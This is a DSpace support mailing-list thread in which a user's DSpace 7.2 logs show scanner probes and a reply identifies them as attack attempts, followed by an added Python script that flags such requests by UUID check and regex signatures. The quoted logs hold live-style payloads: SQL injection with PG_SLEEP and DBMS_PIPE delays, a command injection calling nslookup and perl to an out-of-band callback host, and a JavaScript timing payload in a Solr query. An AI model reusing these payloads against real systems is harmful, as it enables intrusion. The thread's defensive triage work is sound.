Hi Nicolas,

Those logs make it look like someone is attempting to hack into your system or 
find a vulnerability by generating random URLs.

Those "GET /communities/" paths you shared appear to have embedded SQL commands 
and embedded Javascript.  So, they look to be trying to determine if there's a 
way to execute those commands against your system.  DSpace itself will never 
access or use URLs of those types.

My recommendation would be to see if you can block the IP address which is 
sending those commands. While none of those commands should do anything in 
DSpace 7, they are obviously up to no good & trying to find a way to hack your 
system.

Overall, I don't see any bugs here in DSpace's behavior based on anything 
you've shared.

Tim
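
Tim's advice comes down to finding the source of these requests and blocking it. The Node.js console format quoted below records no client address, so the practical first step is to separate the probe requests from normal traffic, then match them by timestamp against the reverse-proxy or Apache access log that does carry the remote IP. The script here is an added example of that triage; it is not part of Tim's or Nicolas's messages and is not DSpace code. The sample lines are constructed from the ones quoted in the thread (the attacker's callback hostname is replaced by a placeholder), and the structural check relies on the fact that DSpace 7 REST paths identify communities, collections and items by UUID, so anything else after /communities/ is malformed by definition. The dspace.log part pulls the rejected query out of the Solr "Cannot parse" error, which is where the JavaScript payload in the dateIssued facet error shows up.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of the Node.js console lines quoted in the
# thread (METHOD path status time ms - -). The first five are modelled on the
# reported probes, with the callback host replaced by a placeholder; the last
# two are ordinary requests added for contrast.
SAMPLE_ACCESS_LOG = """\
GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - -
GET /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e 404 1129.742 ms - -
GET /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76 200 800.296 ms - -
Environment: Production
GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
GET /communities/f824abaf-%7C(nslookup%20oast.example.invalid%7C%7Cperl%20-e%20%22gethostbyname('oast.example.invalid')%22)a85-459f-a087-e521fd3f486f 200 1215.078 ms - -
GET /communities/6a318891-0c45-4277-b3b6-4caa1be4af44 200 120.500 ms - -
GET /search?query=climate 200 35.100 ms - -
"""

# Constructed dspace.log excerpt modelled on the Solr error in the report
# (raw string so the backslashes in the original message survive as-is).
SAMPLE_DSPACE_LOG = r"""
2022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12 org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in Discovery while setting up date facet range:date facet\colon; org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b
org.dspace.discovery.SearchServiceException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
2022-10-12 03:52:01,100 INFO  unknown 70ae76ad-f77a-44f3-8932-58586342dc12 org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::facets built
"""

LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) (?P<ms>[\d.]+) ms")

# DSpace 7 addresses communities, collections and items by UUID, so the path
# segment after /communities/ must have exactly this shape on a clean request.
UUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)

# Coarse signatures for the three payload families visible in the report.
# They are for triage and correlation, not for blocking decisions on their own.
SIGNATURES = {
    "sql": re.compile(r"(?i)(\b(?:OR|AND)\b\s*[\d+\-*/() ]+=|\bSELECT\b|PG_SLEEP|DBMS_PIPE|\bSLEEP\s*\(|\bUNION\b|\bWAITFOR\b)"),
    "cmd": re.compile(r"(?i)(nslookup|gethostbyname|\bperl\s+-e|\bcurl\b|\bwget\b|\|\()"),
    "js": re.compile(r"(?i)(function\s*\(\)|new\s+Date\s*\(|typeof\s+\w+)"),
}


def parse_access_line(line):
    """Parse one console line; return None for lines that are not requests."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"method": m.group("method"),
            "path": unquote(m.group("path")),   # undo %20, %7C, %22, ... once
            "status": int(m.group("status")),
            "ms": float(m.group("ms"))}


def triage_request(req):
    """Return the reasons a request looks like a probe (empty list = clean)."""
    reasons = []
    path = req["path"].split("?", 1)[0]
    parts = path.strip("/").split("/")
    if len(parts) >= 2 and parts[0] in ("communities", "collections", "items"):
        if not UUID_RE.match(parts[1]):
            reasons.append("id is not a UUID")
    for name, rx in SIGNATURES.items():
        if rx.search(req["path"]):
            reasons.append(f"{name} payload")
    return reasons


def scan_access_log(text):
    """Return only the suspicious requests, each annotated with its reasons."""
    findings = []
    for line in text.splitlines():
        req = parse_access_line(line)
        if req is None:
            continue
        reasons = triage_request(req)
        if reasons:
            findings.append({**req, "reasons": reasons})
    return findings


SOLR_ERR_RE = re.compile(r"SyntaxError: Cannot parse '(.*?)': Encountered")


def scan_dspace_log(text):
    """Extract the query Solr rejected from each 'Cannot parse' error and classify it."""
    findings = []
    for line in text.splitlines():
        m = SOLR_ERR_RE.search(line)
        if m:
            query = m.group(1)
            kinds = [name for name, rx in SIGNATURES.items() if rx.search(query)]
            findings.append({"query": query, "kinds": kinds})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['status']} {f['path'][:60]!r}: {', '.join(f['reasons'])}")
    for f in scan_dspace_log(SAMPLE_DSPACE_LOG):
        print(f"Solr rejected {f['query'][:60]!r}: {', '.join(f['kinds']) or 'no known signature'}")
```

The UUID check is the one to rely on: the fourth sample line (`1*4277`) matches none of the payload signatures but is still obviously not a community id, and a request like that from the same client at the same time belongs to the same scan. Once the suspicious timestamps are known, the remote address comes from the proxy log in front of the Angular app, and that is where Tim's block belongs.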
________________________________
From: [email protected] <[email protected]> on behalf of 
Nicolas Battaglia <[email protected]>
Sent: Wednesday, October 12, 2022 3:31 PM
To: DSpace Technical Support <[email protected]>
Subject: [dspace-tech] Support

Hello everybody

I've a problem with my dspace 7.2 PROD server

Today the Angular client stopped working; after restarting it, it works for a 
few minutes and then stops.

In the nodejs console I found messages similar to these

GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - -
GET /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e 404 1129.742 ms - -
GET /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76 200 800.296 ms - -
Environment: Production
GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
Environment: Production
Environment: Production
GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me%7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me')%22)a85-459f-a087-e521fd3f486f 200 1215.078 ms - -

and, in my dspace.log file, some messages like this:

022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12 org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in Discovery while setting up date facet range:date facet\colon; org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b
org.dspace.discovery.SearchServiceException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
    "]" ...
    "}" ...

at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726) ~[dspace-api-7.1.1.jar:7.1.1]

Caused by: org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
    "]" ...
    "}" ...

By the way, today's dspace log file is 200 MB (on other days it is about 4 MB).

Any ideas?

Thanks




--
All messages to this mailing list should adhere to the Code of Conduct: 
https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx
---
You received this message because you are subscribed to the Google Groups 
"DSpace Technical Support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to [email protected].
To view this discussion on the web visit 
https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com.
